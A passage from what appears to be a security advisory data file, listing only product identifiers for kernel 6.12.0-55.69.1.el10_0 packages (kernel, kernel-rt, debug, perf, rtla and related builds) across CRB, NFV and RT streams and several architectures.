"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
